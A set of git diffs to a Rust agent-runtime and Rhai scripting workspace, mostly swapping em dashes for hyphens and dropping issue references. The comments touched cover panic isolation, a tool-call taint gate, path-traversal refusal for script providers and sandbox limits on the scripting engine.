     /// most privileged script surface there is. An absolute path is still
     /// honored: that is the documented way to point at a script kept elsewhere,
@@ -119,8 +119,8 @@ impl ScriptProviderLayer {
     /// Get (or lazily load / reload) the provider named `name`, or `None` when
     /// there is no such script or it fails to load.
     ///
-    /// The cache lock is taken three times — a read, then a write on whichever
-    /// arm the compile lands on — and is **never held across
+    /// The cache lock is taken three times - a read, then a write on whichever
+    /// arm the compile lands on - and is **never held across
     /// `RhaiProvider::from_script`**, which parses and initializes an arbitrary
     /// user-authored `.rhai` file. That call is the slowest and least
     /// trustworthy thing this layer does; holding a process-wide lock across it
@@ -128,14 +128,14 @@ impl ScriptProviderLayer {
     /// inside it poisoned the cache for the whole daemon (issue #109).
     ///
     /// The cost is that two callers racing on the same cold name may both
-    /// compile it. Both get a working provider and the later `insert` wins —
+    /// compile it. Both get a working provider and the later `insert` wins -
     /// wasted work, never a wrong answer, and it self-corrects on the next
     /// lookup because entries are validated by mtime.
     pub fn get_or_load(&self, name: &str) -> Option<Arc<dyn Provider>> {
         let Some(path) = self.resolve_path(name) else {
             tracing::warn!(
                 provider = %name,
-                "script provider path escapes the providers directory — refusing to load"
+                "script provider path escapes the providers directory - refusing to load"
             );
             self.evict(name);
             return None;
@@ -154,7 +154,7 @@ impl ScriptProviderLayer {
             .map(|s| s.init_config.clone())
             .unwrap_or_else(|| serde_json::json!({}));
         let rate_limit = spec.and_then(|s| s.rate_limit.clone());
-        // No lock held here — see the note above.
+        // No lock held here - see the note above.
         match RhaiProvider::from_script(
             name.to_string(),
             &path,
@@ -341,8 +341,8 @@ mod tests {
     }
 
     /// A relative `script` override may not climb out of the providers
-    /// directory. Whatever it reached would be compiled and run as a provider —
-    /// the one script surface with no permission layer in front of it — so the
+    /// directory. Whatever it reached would be compiled and run as a provider -
+    /// the one script surface with no permission layer in front of it - so the
     /// traversal is refused outright rather than normalized away.
     #[test]
     fn relative_script_override_cannot_escape_the_providers_dir() {
@@ -374,7 +374,7 @@ mod tests {
         }
     }
 
-    /// A nested path *inside* the directory is still fine — only `..` is refused.
+    /// A nested path *inside* the directory is still fine - only `..` is refused.
     #[test]
     fn nested_relative_override_inside_the_dir_still_resolves() {
         let dir = tempfile::tempdir().unwrap();

--- a/crates/leviath-runtime/src/script_provider.rs
+++ b/crates/leviath-runtime/src/script_provider.rs
@@ -1,4 +1,4 @@
-//! Lazy, hot-reloading resolution of Rhai *script providers* (issue #101).
+//! Lazy, hot-reloading resolution of Rhai *script providers*.
 //!
 //! Native providers are built eagerly at daemon startup. Script providers are
 //! not: a `.rhai` file in the providers directory becomes a live provider only
@@ -125,7 +125,7 @@ impl ScriptProviderLayer {
     /// user-authored `.rhai` file. That call is the slowest and least
     /// trustworthy thing this layer does; holding a process-wide lock across it
     /// serialized every agent's provider lookup behind one compile, and a panic
-    /// inside it poisoned the cache for the whole daemon (issue #109).
+    /// inside it poisoned the cache for the whole daemon.
     ///
     /// The cost is that two callers racing on the same cold name may both
     /// compile it. Both get a working provider and the later `insert` wins -

--- a/crates/leviath-runtime/src/taint.rs
+++ b/crates/leviath-runtime/src/taint.rs
@@ -19,7 +19,7 @@ pub enum GateResolution {
     AllowOnce,
     /// Allow this tool for the rest of the run (session allow).
     AlwaysAllow,
-    /// Deny the call — it is not executed; the model gets a blocked result.
+    /// Deny the call - it is not executed; the model gets a blocked result.
     Deny,
 }
 
@@ -40,7 +40,7 @@ pub trait GatePrompt: Send + Sync {
 /// `Send + Sync` so a boxed checker can live in a shared-world resource.
 pub type ScriptRuleChecker = dyn Fn(&str, Option<&str>, TaintLevel) -> Option<String> + Send + Sync;
 
-/// Taint gate — checks whether a tool invocation is allowed given the
+/// Taint gate - checks whether a tool invocation is allowed given the
 /// current taint state of the context window. Attached per-agent (as an ECS
 /// component) when the agent's blueprint opts into taint tracking.
 #[derive(Debug, Clone, bevy_ecs::component::Component)]
@@ -845,11 +845,11 @@ mod tests {
 
         let window = make_window_with_taint(TaintLevel::Private);
 
-        // tool_a has Internal clearance — should be blocked by Private taint
+        // tool_a has Internal clearance - should be blocked by Private taint
         let decision_a = gate.check_traditional("agent-1", "tool_a", &window);
         assert!(!decision_a.is_allowed());
 
-        // tool_b has Private clearance — should be allowed
+        // tool_b has Private clearance - should be allowed
         let decision_b = gate.check_traditional("agent-1", "tool_b", &window);
         assert!(decision_b.is_allowed());
     }

--- a/crates/leviath-runtime/src/tick_scope.rs
+++ b/crates/leviath-runtime/src/tick_scope.rs
@@ -4,7 +4,7 @@
 //! Every agent lives in one shared [`World`](bevy_ecs::world::World) driven by
 //! one [`Schedule`](bevy_ecs::schedule::Schedule), so a caught panic carries no
 //! hint of *whose* data tripped it. Without attribution the daemon can only log
-//! "something panicked" and re-tick the same unchanged state on the next wake —
+//! "something panicked" and re-tick the same unchanged state on the next wake -
 //! panicking again, forever, while every other agent stalls behind it.
 //!
 //! Each per-agent loop in the pipeline therefore calls [`enter`] before touching
@@ -18,7 +18,7 @@
 //! Thread-local rather than a global: parallel tests each drive their own world
 //! on their own thread and would otherwise trample a shared slot. This is sound
 //! because the schedule runs single-threaded (see
-//! [`PipelineWorld::new`](crate::world::PipelineWorld::new)) — systems run on
+//! [`PipelineWorld::new`](crate::world::PipelineWorld::new)) - systems run on
 //! the same thread that catches the panic.
 //!
 //! And plainly set/cleared rather than a `Drop` guard: a guard would clear the
@@ -51,7 +51,7 @@ pub fn enter(entity: Entity) {
     CURRENT.with(|c| c.set(Some(entity)));
 }
 
-/// Forget the current agent — call this when a per-agent loop finishes, so a
+/// Forget the current agent - call this when a per-agent loop finishes, so a
 /// later panic in agent-independent code isn't blamed on the last agent seen.
 pub fn clear() {
     CURRENT.with(|c| c.set(None));
@@ -76,14 +76,14 @@ pub struct PanickedInParallel {
 /// Run one agent's share of a parallel system body, containing a panic to that
 /// agent.
 ///
-/// Catching *here* — inside the closure, where `entity` is in hand — is what
+/// Catching *here* - inside the closure, where `entity` is in hand - is what
 /// makes a compute-pool panic attributable at all: the thread-local scope can't
 /// cross back to the driver thread, and letting the panic unwind out of the task
 /// pool would take down the whole fan-out rather than one agent. The remaining
 /// agents in the batch finish normally.
 ///
 /// `body` is a `&mut dyn FnMut` rather than a generic so every caller shares one
-/// instantiation — the workspace gates a hard 100%, and a generic would give
+/// instantiation - the workspace gates a hard 100%, and a generic would give
 /// each call site its own panic arm to cover.
 pub fn run_agent_parallel(entity: Entity, par_commands: &ParallelCommands, body: &mut dyn FnMut()) {
     let caught = std::panic::catch_unwind(std::panic::AssertUnwindSafe(body));

--- a/crates/leviath-runtime/src/tick_scope.rs
+++ b/crates/leviath-runtime/src/tick_scope.rs
@@ -1,5 +1,5 @@
 //! Which agent the pipeline is currently working on, so a panic inside a
-//! schedule system can be blamed on the run that caused it (issue #109).
+//! schedule system can be blamed on the run that caused it.
 //!
 //! Every agent lives in one shared [`World`](bevy_ecs::world::World) driven by
 //! one [`Schedule`](bevy_ecs::schedule::Schedule), so a caught panic carries no

--- a/crates/leviath-runtime/src/tool_bridge.rs
+++ b/crates/leviath-runtime/src/tool_bridge.rs
@@ -1,4 +1,4 @@
-//! The async worker side of the ECS tool stage — the sync-ECS ↔ async-I/O
+//! The async worker side of the ECS tool stage - the sync-ECS ↔ async-I/O
 //! bridge for tool execution.
 //!
 //! When the pipeline decides an agent's response has tool calls to run, the
@@ -9,7 +9,7 @@
 //! results channel, waking the tick loop; the tool-collect system applies the
 //! results on a later tick.
 //!
-//! **Concurrency**: the lane is a *pool* — [`spawn_tool_pool`] runs N workers off
+//! **Concurrency**: the lane is a *pool* - [`spawn_tool_pool`] runs N workers off
 //! one shared job channel (`Arc<Mutex<Receiver>>`). A worker holds the receiver
 //! lock only across `recv()`, then releases it and runs `exec().await`, so up to
 //! N agents' tool batches execute concurrently (the receive is serialized; the
@@ -28,7 +28,7 @@ use tokio::sync::mpsc::{UnboundedReceiver, UnboundedSender};
 use tokio::task::JoinHandle;
 
 /// The future produced by a boxed tool-execution closure: resolves to
-/// `(tool_call_id, result)` pairs — the same shape the engine's tool executors
+/// `(tool_call_id, result)` pairs - the same shape the engine's tool executors
 /// already return.
 pub type ToolExecFuture = Pin<Box<dyn Future<Output = Vec<(String, String)>> + Send>>;
 
@@ -65,7 +65,7 @@ pub type SharedJobRx = Arc<Mutex<UnboundedReceiver<ToolJob>>>;
 /// reporting each outcome and waking the tick loop. Holds the receiver lock only
 /// across `recv()` (so sibling workers can run their `exec().await` in parallel),
 /// then releases it before executing. Returns when the job channel is closed (all
-/// senders dropped — i.e. the world is shutting down).
+/// senders dropped - i.e. the world is shutting down).
 pub async fn tool_worker(
     jobs: SharedJobRx,
     results: UnboundedSender<ToolOutcome>,
@@ -89,7 +89,7 @@ pub async fn tool_worker(
         // This is what returns the worker to the pool: several of the things a
         // batch can await are unbounded (a tool-approval prompt, an `ask_user`,
         // a `wait_for_agent` poll), so without this a cancelled agent kept one
-        // of the lane's fixed number of workers forever — and once they were all
+        // of the lane's fixed number of workers forever - and once they were all
         // taken, no other agent's tools ran either.
         let out = tokio::select! {
             biased;
@@ -107,7 +107,7 @@ pub async fn tool_worker(
 
 /// Spawn a pool of `workers` [`tool_worker`] tasks off one shared job channel and
 /// return their handles. `workers` is clamped to at least 1. This is the tool-lane
-/// concurrency cap — the number of agents whose tool batches may run at once.
+/// concurrency cap - the number of agents whose tool batches may run at once.
 pub fn spawn_tool_pool(
     runtime: &Handle,
     jobs: UnboundedReceiver<ToolJob>,
@@ -165,7 +165,7 @@ mod tests {
                     // `notify_one` (not `notify_waiters`) on both signals: it
                     // stores a permit when nobody is waiting yet, so neither the
                     // test nor the batch can lose the other's wakeup by being
-                    // slow to arm — a real flake on a loaded runner.
+                    // slow to arm - a real flake on a loaded runner.
                     started.notify_one();
                     release.notified().await;
                     vec![("held".to_string(), "done".to_string())]
@@ -245,7 +245,7 @@ mod tests {
     ///
     /// This is what unwedges the daemon: several things a batch can await are
     /// unbounded (a tool-approval prompt, `ask_user`, a `wait_for_agent` poll),
-    /// and the lane has a fixed number of workers — so a cancelled agent used to
+    /// and the lane has a fixed number of workers - so a cancelled agent used to
     /// hold one forever, and once all of them were held no agent's tools ran.
     #[tokio::test(flavor = "multi_thread", worker_threads = 2)]
     async fn a_cancelled_batch_is_abandoned_and_frees_the_worker() {
@@ -254,7 +254,7 @@ mod tests {
         let wake = Arc::new(Notify::new());
         let cancel = crate::cancel::CancelToken::new();
 
-        // A batch that only finishes when released — the unbounded-prompt case.
+        // A batch that only finishes when released - the unbounded-prompt case.
         let started = Arc::new(Notify::new());
         let release = Arc::new(Notify::new());
         jtx.send(held_job(

--- a/crates/leviath-runtime/src/world.rs
+++ b/crates/leviath-runtime/src/world.rs
@@ -1,5 +1,5 @@
 //! The pipeline driver: a single [`PipelineWorld`] that hosts every agent as
-//! ECS data and ticks the [`crate::pipeline`] systems over all of them — the
+//! ECS data and ticks the [`crate::pipeline`] systems over all of them - the
 //! traditional-game-loop core of the shared world.
 //!
 //! The world owns the bevy [`World`], the tick [`Schedule`], the per-model
@@ -17,7 +17,7 @@
 //! At quiescence every remaining agent is either waiting on an in-flight async
 //! job (which will `notify` on completion) or blocked on a resource that only an
 //! async completion can free (a full pool) or on nothing at all (a missing
-//! provider / no input) — so the driver parks on the wake instead of spinning.
+//! provider / no input) - so the driver parks on the wake instead of spinning.
 //! A fresh async result or an external `send_message` fires the wake and the
 //! fixed-point loop re-runs.
 
@@ -49,20 +49,20 @@ use crate::pipeline::{
 use crate::providers::ProviderRegistry;
 use crate::tool_bridge::spawn_tool_pool;
 
-/// Counts of agents in each phase-marker — the world's per-tick "fingerprint".
+/// Counts of agents in each phase-marker - the world's per-tick "fingerprint".
 /// Two consecutive equal fingerprints mean a tick changed nothing (quiescence).
 type Fingerprint = [usize; 12];
 
 /// How many attributed system panics one [`PipelineWorld::run_to_fixed_point`]
 /// round will absorb before it stops driving. Each one fails a different agent,
-/// so this only bites if the world is thoroughly broken — it exists so a
+/// so this only bites if the world is thoroughly broken - it exists so a
 /// pathological agent can't spin the loop.
 const MAX_TICK_FAILURES_PER_ROUND: usize = 8;
 
 /// A schedule configured the way the pipeline needs it.
 ///
 /// Every pipeline system is `.chain()`ed, so the multi-threaded executor can
-/// never overlap two of them — it only adds a hop through the compute task
+/// never overlap two of them - it only adds a hop through the compute task
 /// pool. Running single-threaded keeps systems on the thread that catches their
 /// panics, which is what lets [`run_isolated`] read the offending agent out of
 /// the (thread-local) [`crate::tick_scope`] (issue #109).
@@ -118,7 +118,7 @@ impl PipelineWorld {
     ) -> Self {
         // `Query::par_iter` fans out over the compute task pool; initialize it
         // once (idempotent) so per-agent request assembly in `dispatch_inference`
-        // runs in parallel. (The schedule executor itself is single-threaded —
+        // runs in parallel. (The schedule executor itself is single-threaded -
         // see `tick_schedule`.)
         bevy_tasks::ComputeTaskPool::get_or_init(bevy_tasks::TaskPool::default);
 
@@ -293,11 +293,11 @@ impl PipelineWorld {
     }
 
     /// Enable (or disable) the opt-in exact pre-inference budget guard for this
-    /// world — see [`crate::inference_bridge::InferenceJob::exact_token_counting`].
+    /// world - see [`crate::inference_bridge::InferenceJob::exact_token_counting`].
     /// Call once at startup when the run config requests it, before serving.
     pub fn set_exact_token_counting(&mut self, enabled: bool) {
         // `InferenceStage` is inserted by every `PipelineWorld::new` path, so it
-        // is a hard invariant here — `resource_mut` (which panics if absent) is
+        // is a hard invariant here - `resource_mut` (which panics if absent) is
         // correct and keeps this branch-free.
         self.world
             .resource_mut::<crate::pipeline::InferenceStage>()
@@ -386,7 +386,7 @@ impl PipelineWorld {
     /// alive for the worker to be scheduled). Idempotent: a second call is a no-op
     /// because the persistence resource is already removed and the task taken.
     pub async fn flush_and_stop(&mut self) {
-        // Idempotent — the serve loop has usually already returned on this signal.
+        // Idempotent - the serve loop has usually already returned on this signal.
         self.shutdown.notify_one();
         // Dispatch anything that settled between the last park and now (e.g. an
         // inference result that woke the loop the same instant shutdown fired).
@@ -409,7 +409,7 @@ impl PipelineWorld {
 
     /// Set an agent's status and wake the driver. Returns `false` if the agent no
     /// longer exists. The async-starting dispatchers only act on `Active` agents,
-    /// so this is how the world pauses/resumes/cancels an agent — a non-`Active`
+    /// so this is how the world pauses/resumes/cancels an agent - a non-`Active`
     /// agent is simply data the systems skip until it is `Active` again.
     pub fn set_status(&mut self, entity: Entity, status: AgentStatus) -> bool {
         let Some(mut state) = self.world.get_mut::<AgentState>(entity) else {
@@ -440,7 +440,7 @@ impl PipelineWorld {
     /// so one bad agent can't crash the daemon and take every other hosted agent
     /// with it.
     ///
-    /// When the panic can be traced to a specific agent (the usual case — see
+    /// When the panic can be traced to a specific agent (the usual case - see
     /// [`crate::tick_scope`]), that agent is failed with the panic message so it
     /// stops being driven, its run is persisted as errored, and the host reaps
     /// it. Without that, the world would re-tick the same unchanged state on
@@ -458,7 +458,7 @@ impl PipelineWorld {
                 tracing::error!(
                     ?entity,
                     panic = %panicked.message,
-                    "a pipeline system panicked; failing that agent — the daemon and every \
+                    "a pipeline system panicked; failing that agent - the daemon and every \
                      other run keep going"
                 );
                 TickOutcome::AgentFailed
@@ -467,7 +467,7 @@ impl PipelineWorld {
                 tracing::error!(
                     panic = %panicked.message,
                     "a pipeline system panicked outside any agent's scope; the daemon survived \
-                     (an agent may be wedged — cancel it via `lev cancel <run-id>`)"
+                     (an agent may be wedged - cancel it via `lev cancel <run-id>`)"
                 );
                 TickOutcome::Unattributed
             }
@@ -479,7 +479,7 @@ impl PipelineWorld {
     /// whether there were any.
     ///
     /// These panics were caught on a task-pool thread rather than unwinding into
-    /// `tick`, so the marker component is how they reach the driver — but from
+    /// `tick`, so the marker component is how they reach the driver - but from
     /// here on they are handled exactly like an attributed unwind: the agent is
     /// failed, stops being driven, and its run persists as errored.
     fn fail_agents_panicked_in_parallel(&mut self) -> TickOutcome {
@@ -589,7 +589,7 @@ impl PipelineWorld {
     }
 
     /// Drive every agent as far as it can go **right now**, then, while async
-    /// work is in flight, wait for each completion and drive again — returning
+    /// work is in flight, wait for each completion and drive again - returning
     /// once the world is fully quiescent with nothing in flight. Bounded by
     /// `max_waits` wake-waits as a safety valve so a lost/never-arriving wake
     /// can't hang a caller (e.g. a test) forever.
@@ -660,7 +660,7 @@ fn run_isolated(schedule: &mut Schedule, world: &mut World) -> Result<(), TickPa
 /// bevy's executors mark a system "completed" *before* running it and only
 /// clear that set when `run` returns normally. A panic therefore leaves every
 /// system up to and including the offending one marked done, so the **next**
-/// tick silently skips them and only runs the tail of the chain — a partial
+/// tick silently skips them and only runs the tail of the chain - a partial
 /// tick that would, among other things, keep `dispatch_persistence` from ever
 /// seeing an agent we just failed. Swapping the executor kind and back is the
 /// public API for forcing a rebuild.
@@ -671,7 +671,7 @@ fn run_isolated(schedule: &mut Schedule, world: &mut World) -> Result<(), TickPa
 /// with an empty `completed_systems`.
 ///
 /// On 0.15 this had to set two different *kinds* and swap back, because
-/// `set_executor_kind` was a no-op when the kind was unchanged — and
+/// `set_executor_kind` was a no-op when the kind was unchanged - and
 /// `SimpleExecutor`, the other kind it used, no longer exists.
 fn reset_executor(schedule: &mut Schedule) {
     schedule.set_executor(bevy_ecs::schedule::SingleThreadedExecutor::new());
@@ -682,7 +682,7 @@ mod tests {
     use super::*;
 
     /// Serializes every test in this binary that swaps the **process-global**
-    /// panic hook — see the definition for why they can't run concurrently.
+    /// panic hook - see the definition for why they can't run concurrently.
     use crate::test_support::PANIC_HOOK_LOCK;
 
     /// Run `f` with the process panic hook silenced (the panic is expected), and
@@ -704,7 +704,7 @@ mod tests {
         fn boom_system() {
             panic!("simulated system panic");
         }
-        // A system that panics *while working on a specific agent* — the shape
+        // A system that panics *while working on a specific agent* - the shape
         // every real pipeline system has.
         fn boom_on_agent_system() {
             crate::tick_scope::enter(
@@ -963,7 +963,7 @@ mod tests {
 
     #[tokio::test]
     async fn run_to_fixed_point_survives_a_panicking_system() {
-        // A system that panics must not hang or crash the drive loop — it's
+        // A system that panics must not hang or crash the drive loop - it's
         // caught and the loop breaks (the daemon survives).
         fn boom_system() {
             panic!("simulated system panic");
@@ -979,7 +979,7 @@ mod tests {
         // `dispatch_inference` fans its per-agent work out over the compute task
         // pool, where the thread-local scope can't reach the driver thread that
         // catches unwinds. Those bodies run under `run_agent_parallel`, which
-        // catches on the pool thread and marks the agent instead — this proves
+        // catches on the pool thread and marks the agent instead - this proves
         // the marker makes it back and fails the right run (issue #109).
         fn boom_in_parallel(
             agents: Query<(Entity, &AgentState)>,
@@ -987,7 +987,7 @@ mod tests {
         ) {
             agents.par_iter().for_each(|(entity, state)| {
                 if state.status != AgentStatus::Active {
-                    return; // already failed — nothing left to blow up
+                    return; // already failed - nothing left to blow up
                 }
                 // Clear the thread-local first: whatever attributes this panic,
                 // it is demonstrably not the `enter`/`current` mechanism.
@@ -1038,7 +1038,7 @@ mod tests {
                 .iter()
                 .find(|(_, state)| state.status == AgentStatus::Active)
             else {
-                return; // the agent has been failed — nothing left to blow up
+                return; // the agent has been failed - nothing left to blow up
             };
             crate::tick_scope::enter(entity);
             *VICTIM
@@ -1392,7 +1392,7 @@ mod tests {
         // The persistence worker is fire-and-forget on its own task; poll until the
         // final (Complete) snapshot has been flushed. A short real sleep between
         // polls (rather than a bare `yield_now`) gives the worker's write actual
-        // wall-clock time to land under load — otherwise the loop can spin through
+        // wall-clock time to land under load - otherwise the loop can spin through
         // every iteration before the write completes and spuriously time out.
         let meta_path = dir.path().join("run-42").join("meta.json");
         let mut meta = None;
@@ -1416,14 +1416,14 @@ mod tests {
     async fn a_panicked_agent_is_recorded_as_errored_on_disk() {
         // The reported symptom in issue #109: a crashed run stayed `"running"`
         // in meta.json forever. `dispatch_persistence` is the *last* system in
-        // the chain, so the tick that panics never reaches it — which is exactly
+        // the chain, so the tick that panics never reaches it - which is exactly
         // why `run_to_fixed_point` keeps driving after failing the agent.
         fn boom_on_active_agent(agents: Query<(Entity, &AgentState)>) {
             let Some((entity, _)) = agents
                 .iter()
                 .find(|(_, state)| state.status == AgentStatus::Active)
             else {
-                return; // the agent has been failed — nothing left to blow up
+                return; // the agent has been failed - nothing left to blow up
             };
             crate::tick_scope::enter(entity);
             panic!("exploded mid-stage");
@@ -1526,7 +1526,7 @@ mod tests {
     async fn persists_interaction_point_when_a_live_agent_blocks() {
         // Drive a real agent through inference → transition → the interaction-point
         // lane until it blocks awaiting approval, and assert the daemon wrote the
-        // `interactions.json` sidecar — the issue #38 persist side, end-to-end
+        // `interactions.json` sidecar - the issue #38 persist side, end-to-end
         // through the live lane (a tool call first, then a text "plan", so the stage
         // transitions into the interaction point rather than looping on nudges).
         let dir = tempfile::tempdir().unwrap();
@@ -1610,7 +1610,7 @@ mod tests {
     #[tokio::test]
     async fn flush_and_stop_drains_queued_snapshots() {
         // Unlike a plain shutdown, `flush_and_stop` awaits the persistence worker,
-        // so the final snapshot is guaranteed on disk the instant it returns — no
+        // so the final snapshot is guaranteed on disk the instant it returns - no
         // filesystem polling required (contrast the test above).
         let dir = tempfile::tempdir().unwrap();
         let mut world = PipelineWorld::new(
@@ -1657,14 +1657,14 @@ mod tests {
         world.run_until_idle(20).await;
         world.flush_and_stop().await;
 
-        // Read immediately — the drain guarantees the write landed.
+        // Read immediately - the drain guarantees the write landed.
         let meta_path = dir.path().join("run-flush").join("meta.json");
         let text = std::fs::read_to_string(&meta_path).expect("meta.json flushed on stop");
         let meta: leviath_core::run_meta::RunMeta = serde_json::from_str(&text).unwrap();
         assert_eq!(meta.run_id, "run-flush");
         assert_eq!(meta.status, leviath_core::run_meta::RunStatus::Complete);
 
-        // A second call is a no-op (resource already removed, task taken) — no panic.
+        // A second call is a no-op (resource already removed, task taken) - no panic.
         world.flush_and_stop().await;
         assert!(meta_path.exists());
     }
@@ -1673,7 +1673,7 @@ mod tests {
     async fn world_init_and_restore_needs_no_daemon_infra() {
         // `PipelineWorld::new` + `restore::restore_agent` form a self-contained
         // spin-up→restore path: no control socket, HTTP server, PID files, or build
-        // markers — only providers, a tool service, a runs dir, and a runtime. This
+        // markers - only providers, a tool service, a runs dir, and a runtime. This
         // locks that in so the daemon wiring stays optional.
         use leviath_core::region::EntryKind;
         use leviath_core::run_meta::{ContextSnapshot, RegionEntrySnapshot, RegionSnapshot};

--- a/crates/leviath-runtime/src/world.rs
+++ b/crates/leviath-runtime/src/world.rs
@@ -65,7 +65,7 @@ const MAX_TICK_FAILURES_PER_ROUND: usize = 8;
 /// never overlap two of them - it only adds a hop through the compute task
 /// pool. Running single-threaded keeps systems on the thread that catches their
 /// panics, which is what lets [`run_isolated`] read the offending agent out of
-/// the (thread-local) [`crate::tick_scope`] (issue #109).
+/// the (thread-local) [`crate::tick_scope`].
 fn tick_schedule() -> Schedule {
     let mut schedule = Schedule::default();
     // bevy_ecs 0.19 replaced `set_executor_kind(ExecutorKind::…)` with
@@ -444,7 +444,7 @@ impl PipelineWorld {
     /// [`crate::tick_scope`]), that agent is failed with the panic message so it
     /// stops being driven, its run is persisted as errored, and the host reaps
     /// it. Without that, the world would re-tick the same unchanged state on
-    /// every wake and panic again indefinitely (issue #109).
+    /// every wake and panic again indefinitely.
     pub fn tick(&mut self) -> TickOutcome {
         let Err(panicked) = run_isolated(&mut self.schedule, &mut self.world) else {
             // A clean unwind doesn't mean a clean tick: work that ran on the
@@ -859,10 +859,10 @@ mod tests {
 
     /// A stage advertising the tools the scripted responses here actually call.
     ///
-    /// It used to advertise none, which stopped mattering the moment dispatch
-    /// began refusing tools a stage never offered: every end-to-end test that
-    /// drives a tool call short-circuited into a refusal, and the tool service
-    /// was never reached at all.
+    /// Advertising them is load-bearing: dispatch refuses tools a stage never
+    /// offered, so with an empty tool list every end-to-end test that drives a
+    /// tool call would short-circuit into a refusal and the tool service would
+    /// never be reached at all.
     fn stage(model: &str) -> StageInference {
         StageInference {
             provider_name: "script".to_string(),

--- a/crates/leviath-runtime/tests/context_management.rs
+++ b/crates/leviath-runtime/tests/context_management.rs
@@ -92,7 +92,7 @@ fn test_eviction_cascade_temporary_then_compacting() {
 
     assert_eq!(window.current_tokens, 4500);
 
-    // Evict with small target — should clear Clearable first
+    // Evict with small target - should clear Clearable first
     let result = window.try_evict(1000).unwrap();
     assert!(result.tokens_freed >= 1500);
 
@@ -224,7 +224,7 @@ fn test_context_window_add_to_region() {
 
 #[test]
 fn test_eviction_result_needs_compaction_when_compacting_full() {
-    // Small window — compacting content nearly fills it
+    // Small window - compacting content nearly fills it
     let mut window = ContextWindow::new(1500);
 
     // Add a compacting region over its threshold

--- a/crates/leviath-scripting/Cargo.toml
+++ b/crates/leviath-scripting/Cargo.toml
@@ -10,7 +10,7 @@ authors.workspace = true
 # crates. Saying so explicitly prevents an accidental `cargo publish` and lets
 # cargo-deny treat the intra-workspace `path` dependencies as what they are
 # rather than as unbounded version requirements. Remove this line if a crate is
-# ever meant to be published — at which point its path deps need versions too.
+# ever meant to be published - at which point its path deps need versions too.
 publish = false
 
 [dependencies]

--- a/crates/leviath-scripting/src/engine.rs
+++ b/crates/leviath-scripting/src/engine.rs
@@ -221,7 +221,7 @@ mod tests {
         let engine = ScriptEngine::new();
         let input = rhai::Map::new();
 
-        // Returns an integer, not a String — eval_with_scope::<String> should error.
+        // Returns an integer, not a String - eval_with_scope::<String> should error.
         let script = "42";
         let result = engine.transform(script, input);
         assert!(result.is_err());

--- a/crates/leviath-scripting/src/functions.rs
+++ b/crates/leviath-scripting/src/functions.rs
@@ -283,7 +283,7 @@ mod tests {
     #[test]
     fn is_markdown_plain_nonempty_text_returns_true_via_nonempty_fallback() {
         let e = engine();
-        // Text with none of the markdown markers — falls through to !text.is_empty()
+        // Text with none of the markdown markers - falls through to !text.is_empty()
         let result: bool = e.eval(r#"is_markdown("just plain text")"#).unwrap();
         assert!(result);
     }

--- a/crates/leviath-scripting/src/lib.rs
+++ b/crates/leviath-scripting/src/lib.rs
@@ -15,9 +15,9 @@ pub mod types;
 /// Apply the sandbox limits every Leviath Rhai engine shares.
 ///
 /// One function rather than a block copied into each engine constructor. There
-/// were three such copies — `ScriptEngine::new`, `build_tool_engine` (whose
+/// were three such copies - `ScriptEngine::new`, `build_tool_engine` (whose
 /// comment read "Same hardening as `ScriptEngine::new`", which it was not
-/// entirely), and the provider engine — with divergent limits and no way to add
+/// entirely), and the provider engine - with divergent limits and no way to add
 /// a control to all of them at once. This is a security control; it should have
 /// exactly one definition.
 ///

--- a/crates/leviath-scripting/src/lib.rs
+++ b/crates/leviath-scripting/src/lib.rs
@@ -32,7 +32,7 @@ pub fn harden(engine: &mut rhai::Engine, max_operations: u64) {
     engine.set_max_map_size(10_000);
     // Bound *recursion*: without a call-depth cap, a script recursing to
     // exhaustion overflows the native stack, which aborts the process rather
-    // than raising a catchable Rhai error. This was previously set nowhere.
+    // than raising a catchable Rhai error. Rhai does not cap this by default.
     engine.set_max_call_levels(64);
     // Generous expression nesting. Rhai's default is much lower in debug builds
     // (a stack-overflow guard for unoptimized code) and would reject legitimate

--- a/crates/leviath-scripting/src/tool.rs
+++ b/crates/leviath-scripting/src/tool.rs
@@ -1,4 +1,4 @@
-//! Rhai *script tools* - drop-in tool definitions for agent blueprints (issue #97).
+//! Rhai *script tools* - drop-in tool definitions for agent blueprints.
 //!
 //! A `.rhai` file in an agent's `tools/` directory (or the global
 //! `~/.leviath/tools/`) defines one custom tool. Its metadata comes from comment
@@ -433,7 +433,7 @@ pub const SCRIPT_TOOL_MAX_OPERATIONS: u64 = 500_000;
 ///
 /// A panic raised by a native (host) function never unwinds through this call:
 /// it is caught at the native-function boundary by `guard_str`/`guard_dyn`
-/// and arrives here as an ordinary script error (issue #109). Anything that
+/// and arrives here as an ordinary script error. Anything that
 /// still escapes - a panic from Rhai's own internals - is contained one level
 /// up, where the daemon runs this on a `spawn_blocking` task and turns the
 /// resulting `JoinError` into a tool error.
@@ -507,14 +507,13 @@ fn panic_to_rhai(name: &str, payload: Box<dyn std::any::Any + Send>) -> Box<Eval
 /// Run a `String`-returning native function so a panic inside it **never**
 /// unwinds into Rhai.
 ///
-/// This is the primary fix for issue #109. Rhai's `exec_native_fn_call` takes an
-/// `ArgBackup` whenever the first argument is a variable reference (which is
-/// every real call shape, e.g. `http_get(params.url)`), and restores it *after*
-/// the call returns. A panicking native function skips that restore, and
-/// `ArgBackup`'s destructor then asserts during unwinding - a second panic while
-/// panicking, which Rust turns into `abort()`. That aborted the whole daemon,
-/// killing every concurrent run. Catching here means the unwind never reaches
-/// Rhai's frame at all.
+/// Rhai's `exec_native_fn_call` takes an `ArgBackup` whenever the first
+/// argument is a variable reference (which is every real call shape, e.g.
+/// `http_get(params.url)`), and restores it *after* the call returns. A
+/// panicking native function skips that restore, and `ArgBackup`'s destructor
+/// then asserts during unwinding - a second panic while panicking, which Rust
+/// turns into `abort()`, taking down the whole daemon and every concurrent
+/// run. Catching here means the unwind never reaches Rhai's frame at all.
 ///
 /// Deliberately **not generic**: a generic guard monomorphizes per closure, and
 /// each instantiation's panic arm would then need its own test to hold the
@@ -552,7 +551,7 @@ fn headers_from_map(map: &Map) -> BTreeMap<String, String> {
 ///
 /// **Every** registration goes through [`guard_str`] / [`guard_dyn`], so a panic
 /// anywhere in a native function becomes an ordinary Rhai runtime error instead
-/// of unwinding into Rhai and aborting the process (issue #109). The pure
+/// of unwinding into Rhai and aborting the process. The pure
 /// helpers are guarded too - they run on untrusted, model- and network-supplied
 /// input, so "this one can't panic" is not a property worth betting the daemon on.
 fn register_host_functions(engine: &mut Engine, host: Arc<dyn ScriptHost>) {
@@ -752,13 +751,13 @@ const ENTITY_SCAN_CHARS: usize = 12;
 /// Decode common HTML entities (named + numeric decimal/hex). Unknown or
 /// unterminated entities are left verbatim.
 ///
